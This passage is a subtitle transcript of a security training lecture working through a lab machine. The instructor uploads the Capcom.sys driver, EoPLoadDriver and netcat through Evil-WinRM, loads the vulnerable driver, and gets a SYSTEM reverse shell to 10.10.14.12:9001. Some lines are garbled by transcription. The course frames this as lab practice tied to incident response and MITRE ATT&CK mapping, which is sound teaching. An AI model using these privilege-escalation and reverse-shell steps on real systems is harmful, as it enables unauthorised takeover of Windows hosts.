00:26:24,500 --> 00:26:24,690
Right.

398
00:26:24,710 --> 00:26:25,430
There's a test folder.

399
00:26:25,430 --> 00:26:31,910
Let's see if we can upload it there, but we might not have execution privileges on all these folders.

400
00:26:34,070 --> 00:26:42,140
I'm kind of more inclined to use this universal print driver folder because we are a printer service

401
00:26:42,140 --> 00:26:42,530
account.

402
00:26:43,250 --> 00:26:45,530
So we should have rights to write to this folder here.

403
00:26:46,910 --> 00:26:48,770
So let's start there and let's modify if it doesn't work.

404
00:26:48,800 --> 00:27:01,580
OK, so we've got cd data, cd HP Universal Print Driver, OK, sweet, so we can upload, upload

405
00:27:01,580 --> 00:27:03,410
Capcom.sys.

406
00:27:06,370 --> 00:27:15,190
Upload EoPLoadDriver, nc.exe, and it's pulling all this from the local directory, this home folder,

407
00:27:15,190 --> 00:27:18,610
boxes, views, because I ran Evil-WinRM out of this folder.

408
00:27:18,610 --> 00:27:25,030
So it knows just to look in this folder for any argument I pass to the upload command, and this is an

409
00:27:25,030 --> 00:27:25,240
Evil-

410
00:27:25,240 --> 00:27:28,240
WinRM, Evil-WinRM feature, this upload command I'm using.

411
00:27:29,560 --> 00:27:32,920
All right, so we upload Capcom.sys, succeeded.

412
00:27:38,330 --> 00:27:41,960
And then, of course, we want to upload our beloved.

413
00:27:44,090 --> 00:27:49,100
Speaking of netcat, we need to make sure we set up our handler for netcat. First, make sure we have

414
00:27:49,120 --> 00:27:49,680
our files here.

415
00:27:49,700 --> 00:27:50,030
We do.

416
00:27:51,350 --> 00:27:51,920
That looks good.

417
00:27:52,310 --> 00:27:53,060
Let's set up our net-

418
00:27:53,060 --> 00:27:58,300
cat handler. What are we going to do? We're going to use rlwrap to catch it.

419
00:27:58,310 --> 00:27:59,440
Now, what is rlwrap?

420
00:27:59,450 --> 00:28:02,300
You see, I don't have it installed right here, that's why it's red.

421
00:28:03,200 --> 00:28:03,980
I'll tell you what it is.

422
00:28:03,990 --> 00:28:06,160
sudo apt search rlwrap.

423
00:28:09,110 --> 00:28:09,530
All right.

424
00:28:10,430 --> 00:28:14,390
sudo apt. See, what does it show?

425
00:28:15,380 --> 00:28:17,090
Try to hit sudo, space, apt,

426
00:28:17,240 --> 00:28:18,770
space, tab.

427
00:28:20,600 --> 00:28:22,490
That's how I got that list of everything I needed.

428
00:28:22,800 --> 00:28:23,810
You see what this does, right?

429
00:28:24,370 --> 00:28:30,530
It's a readline editor, and it's a readline feature command line wrapper.

430
00:28:32,300 --> 00:28:34,490
Input history is remembered across invocations.

431
00:28:35,000 --> 00:28:35,210
Right?

432
00:28:35,270 --> 00:28:40,190
This is what we want when we're connecting the reverse shell back from Windows to a Linux box, because it

433
00:28:40,190 --> 00:28:44,100
gives us the up/down functionality that we love to use in a Windows shell.

434
00:28:44,160 --> 00:28:46,400
Trust me, without it, your life will suck; with it,

435
00:28:46,520 --> 00:28:47,060
it won't.

436
00:28:47,420 --> 00:28:52,700
So just make sure you use it, so, you know, rlwrap the Windows shell.

437
00:28:54,560 --> 00:28:59,810
We're going to do sudo apt install rlwrap, dash y to say yes to defaults.

438
00:29:01,100 --> 00:29:06,470
sudo rlwrap nc, dash n, because of names,

439
00:29:07,100 --> 00:29:07,730
v, verbose,

440
00:29:07,730 --> 00:29:08,780
l, listen, on port

441
00:29:09,080 --> 00:29:10,430
9001.

442
00:29:12,180 --> 00:29:16,820
Let's go back here, and first we need to load the driver, so we'll say dot backslash.

443
00:29:16,830 --> 00:29:22,100
This is how you execute executables in PowerShell, because we are in PowerShell.

444
00:29:24,350 --> 00:29:28,670
See, this is a PowerShell command, environment variables, including the PowerShell, and you can see we're

445
00:29:28,670 --> 00:29:30,230
in PowerShell 5.1.

446
00:29:30,830 --> 00:29:32,030
That's what this means over here.

447
00:29:32,030 --> 00:29:33,740
We're in PowerShell, right.

448
00:29:34,250 --> 00:29:40,610
So we can say EoPLoadDriver just to get a list of how we should use it.

449
00:29:40,790 --> 00:29:41,870
Right from our logic.

450
00:29:42,380 --> 00:29:48,290
So we give it the name registry, a registry value, and then the full path to the driver.

451
00:29:49,100 --> 00:29:59,750
So if we do EoPLoadDriver.exe, and we can say System\CurrentControlSet\Capcom.

452
00:30:00,650 --> 00:30:03,260
And then I'm going to follow the instructions exactly how it says here.

453
00:30:03,590 --> 00:30:03,940
Right.

454
00:30:03,950 --> 00:30:06,800
Even though Capcom.sys is in my local folder,

455
00:30:08,210 --> 00:30:10,100
I'm not just going to put Capcom.sys like this.

456
00:30:10,100 --> 00:30:11,320
Actually, if we do that, it won't work.

457
00:30:12,020 --> 00:30:12,670
I've tried it.

458
00:30:13,070 --> 00:30:15,820
I mean, you have to put it exactly as it's written inside the exploit.

459
00:30:15,840 --> 00:30:16,160
That's right.

460
00:30:16,160 --> 00:30:22,180
It's really important to really, you know, read the instructions, you know, before you run

461
00:30:22,360 --> 00:30:23,150
these exploits.

462
00:30:23,810 --> 00:30:27,910
The that's what the convenience artfulness.

463
00:30:30,020 --> 00:30:31,010
And what am I doing here?

464
00:30:31,070 --> 00:30:32,810
I want to put the second backslash.

465
00:30:34,380 --> 00:30:43,040
That's it, and then it's going to be Capcom.sys. Let's see if this works. Win error zero.

466
00:30:43,250 --> 00:30:43,730
That's good.

467
00:30:43,730 --> 00:30:45,230
And I've got no zeros here.

468
00:30:45,830 --> 00:30:46,700
So it's probably loaded.

469
00:30:47,150 --> 00:30:51,920
And what we can do now is assuming that it is we can try to run this exploit Capcom and if all goes

470
00:30:51,920 --> 00:30:56,840
well, then we should get a reverse shell back to our system.

471
00:30:57,020 --> 00:30:57,380
Right.

472
00:30:57,680 --> 00:31:05,690
You remember back here, what we did is we're telling it to, you know, go to Windows\

473
00:31:06,080 --> 00:31:10,520
System32\cmd.exe and run this command, nc.exe.

474
00:31:10,610 --> 00:31:18,080
It's going to know where nc.exe is because we are currently executing this exploit from a directory that

475
00:31:18,080 --> 00:31:19,160
contains that binary.

476
00:31:19,940 --> 00:31:23,120
That's our IP, 10.10.14.12, 9001.

477
00:31:23,120 --> 00:31:29,240
We're listening on that and it sends back a cmd shell, which should be running as SYSTEM, and nc is listening

478
00:31:29,240 --> 00:31:30,410
on port 9001 here.

479
00:31:30,970 --> 00:31:31,280
Right.

480
00:31:32,180 --> 00:31:33,470
So hopefully that makes sense.

481
00:31:34,160 --> 00:31:35,320
Let's go ahead and give it.

482
00:31:35,330 --> 00:31:38,030
Go see what happens when the truth.

483
00:31:41,160 --> 00:31:42,960
Bam, we did get a shell back.

484
00:31:42,980 --> 00:31:50,110
But is it running as SYSTEM? And it is, so there we go, we just escalated our privileges to SYSTEM, control

485
00:31:50,120 --> 00:31:56,520
easy to system into the system and look at all the privileges now that we have in the box.

486
00:31:56,540 --> 00:31:57,710
This box is now ours.

487
00:31:58,640 --> 00:32:04,730
In the next lecture, we're actually going to use another technique to break into the system.

488
00:32:05,430 --> 00:32:09,650
I mean, sorry, to escalate our privileges, and we're going to use Zerologon.

489
00:32:10,640 --> 00:32:13,110
It's relatively new by the time you go through this video.

490
00:32:13,130 --> 00:32:17,240
It may not be so new, but it was really interesting because it's basically one click to domain admin,

491
00:32:18,020 --> 00:32:20,810
and I want to see if we can give it a go on this machine.

492
00:32:20,990 --> 00:32:23,300
And then, of course, we'll go through the incident response process.

493
00:32:23,300 --> 00:32:26,990
We'll look at the logs, we'll see what we could have detected from an incident

494
00:32:26,990 --> 00:32:30,290
response perspective, and then we'll map everything to the MITRE ATT&CK framework.

495
00:32:30,380 --> 00:32:30,640
All right.

496
00:32:30,650 --> 00:32:32,360
I'll see you guys in the next lecture. Bye.
